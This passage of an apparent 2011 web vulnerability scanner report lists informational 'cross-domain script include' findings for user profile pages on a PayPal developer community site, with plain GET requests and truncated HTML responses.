Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.214. https://www.x.com/people/PayPal_Sudha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.215. https://www.x.com/people/PayPal_ToddS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.216. https://www.x.com/people/Praveen

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35353331393b332c35373137393b332c35333436333b332c35333437343b332c323030383b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.217. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.218. https://www.x.com/people/RightWayMail

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.219. https://www.x.com/people/S.Aijaz

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.220. https://www.x.com/people/SRS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.221. https://www.x.com/people/Saleem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.222. https://www.x.com/people/Shade8934

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.223. https://www.x.com/people/Suneetha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.224. https://www.x.com/people/admin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.225. https://www.x.com/people/amypiazza00

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/amypiazza00

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/amypiazza00 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=166730 t=1313157109973921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.226. https://www.x.com/people/angelleye

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/angelleye

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/angelleye HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=188523 t=1313157134358773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.227. https://www.x.com/people/billday

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/billday

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/billday HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:35 GMT; Path=/
Vary: User-Agent
JP: D=155484 t=1313157155442148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.228. https://www.x.com/people/blingnation2010

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/blingnation2010

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/blingnation2010 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:57 GMT; Path=/
Vary: User-Agent
JP: D=82638 t=1313157117852719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.229. https://www.x.com/people/bryngregory

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/bryngregory

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/bryngregory HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:49 GMT; Path=/
Vary: User-Agent
JP: D=142323 t=1313157169831259
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.230. https://www.x.com/people/das_licht

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/das_licht

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/das_licht HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=93807 t=1313157132393620
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.231. https://www.x.com/people/dchankhour

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/dchankhour

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/dchankhour HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:44 GMT; Path=/
Vary: User-Agent
JP: D=75356 t=1313157164475506
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.232. https://www.x.com/people/eferreira

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/eferreira

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/eferreira HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=84607 t=1313157130615032
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.233. https://www.x.com/people/emailPasswordToken!input.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=41689 t=1313157111149225
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
